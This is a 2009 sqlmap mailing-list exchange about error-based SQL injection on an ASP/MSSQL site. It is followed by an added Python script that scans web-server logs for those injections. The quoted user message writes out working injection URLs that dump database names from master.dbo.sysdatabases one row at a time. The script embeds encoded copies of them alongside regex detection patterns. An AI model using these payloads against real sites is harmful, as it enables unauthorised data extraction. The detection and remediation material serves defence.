Re: [sqlmap-users] sqlmap and string injections
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:35:55
sqlmap supports string injections, but not with the following error-based payload. It will come in the long run.

Cheers,
B

On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote:
> Hi,
> Does sqlmap support string injections?
> I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL 2000) which is vulnerable to SQL injection.
>
> Example:
> www.xyz.com/default.asp?pag=anypage.asp
> "pag" is the injectable parameter
>
> I'm able to successfully enumerate users and databases using sqlmap only via blind SQL injection because for some reason other supported SQL injection methods fail with the error: "[WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind"
>
> Using other scanners I noticed that it is possible to dump data (for example databases listing) using queries like these:
>
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
>
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
>
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
>
> etc.
>
> This method is really fast (behind proxy too) compared to the extreme slowness of a blind SQL injection.
>
> Why doesn't sqlmap detect this type of injection?
>
> Thank you
> Regards
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
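From the defender's side, the payload family quoted in the thread has a very recognisable shape in web-server logs: a quote that breaks out of the string literal, a `select top N` subquery that increments by one per request, a `cast(... as nvarchar)` used to force a conversion error, `char(94)` as a separator, a system table, and a trailing `--`. The script below is an added example (not code from the thread or from sqlmap) that scans access-log lines for that combination and reports sources that are walking a table row by row. The log lines, the indicator set and the threshold of three co-occurring indicators are all constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the thread): one benign
# request followed by two requests shaped like the quoted error-based payloads,
# URL-encoded the way a browser or scanner would send them.
SAMPLE_LOG = r"""
10.0.0.5 - - [06/Dec/2009:15:40:01 +0000] "GET /default.asp?pag=anypage.asp HTTP/1.1" 200 5120
10.0.0.9 - - [06/Dec/2009:15:41:17 +0000] "GET /default.asp?pag=anypage.asp%27%20and%200%3D(select%20top%201%20cast(%5Bname%5D%20as%20nvarchar(256))%2Bchar(94)%2Bcast(%5Bfilename%5D%20as%20nvarchar(256))%20from(select%20top%2027%20dbid,name,filename%20from%20%5Bmaster%5D.%5Bdbo%5D.%5Bsysdatabases%5D%20order%20by%20%5Bdbid%5D)%20t%20order%20by%20%5Bdbid%5D%20desc)-- HTTP/1.1" 500 812
10.0.0.9 - - [06/Dec/2009:15:41:18 +0000] "GET /default.asp?pag=anypage.asp%27%20and%200%3D(select%20top%201%20cast(%5Bname%5D%20as%20nvarchar(256))%2Bchar(94)%2Bcast(%5Bfilename%5D%20as%20nvarchar(256))%20from(select%20top%2028%20dbid,name,filename%20from%20%5Bmaster%5D.%5Bdbo%5D.%5Bsysdatabases%5D%20order%20by%20%5Bdbid%5D)%20t%20order%20by%20%5Bdbid%5D%20desc)-- HTTP/1.1" 500 812
"""

# Common log format: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# One regex per feature of the payload family. A request is flagged only when
# several features co-occur, so a lone apostrophe or "--" in a legitimate
# value (an O'Brien, a dashed comment) does not raise noise on its own.
INDICATORS = {
    "quote_break":  re.compile(r"'\s*(and|or)\b", re.I),          # ' and 0=(...
    "select_top_n": re.compile(r"\bselect\s+top\s+\d+\b", re.I),  # row selection
    "cast_to_text": re.compile(r"\bcast\s*\(.+?\bas\s+n?varchar\b", re.I | re.S),
    "char_concat":  re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I),  # char(94) separator
    "system_table": re.compile(r"\bsysdatabases\b", re.I),        # catalog table
    "comment_tail": re.compile(r"--\s*$"),                        # comment out the rest
}
THRESHOLD = 3  # assumed: at least this many indicators in one parameter value

# The inner "select top N dbid ..." is what advances one row per request.
TOP_N_RE = re.compile(r"\bselect\s+top\s+(\d+)\s+dbid", re.I)


def parse_line(line):
    """Split one log line into fields and percent-decode its query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def scan_params(params):
    """Return one hit per parameter whose decoded value trips THRESHOLD indicators."""
    hits = []
    for name, value in params:
        matched = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
        if len(matched) >= THRESHOLD:
            top = TOP_N_RE.search(value)
            hits.append({"param": name, "indicators": matched,
                         "top_n": int(top.group(1)) if top else None})
    return hits


def analyze_log(text):
    """Scan every line; return flagged requests with their source and context."""
    findings = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for hit in scan_params(rec["params"]):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "status": rec["status"], **hit})
    return findings


def row_walking_sources(findings):
    """Group hits by (ip, path, param) and report groups whose TOP n strictly
    increases across requests: the signature of dumping a table row by row."""
    seq = {}
    for f in findings:
        if f["top_n"] is not None:
            seq.setdefault((f["ip"], f["path"], f["param"]), []).append(f["top_n"])
    return sorted(key for key, ns in seq.items()
                  if len(ns) >= 2 and all(b > a for a, b in zip(ns, ns[1:])))


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["path"], f["param"], f["status"], f["top_n"], f["indicators"])
    print("row-walking sources:", row_walking_sources(found))
```

Two points worth noting. The decoding step matters: the indicators are matched against the percent-decoded parameter value, so encoding the quote as `%27` or the brackets as `%5B`/`%5D` does not evade them, and the 500 status on the flagged lines is the conversion error the technique relies on, which is itself a useful secondary signal. And the root fix on the application side is unchanged by any of this: the `pag` parameter should never be concatenated into SQL text in the first place, so detection like this belongs alongside parameterised queries, not in place of them.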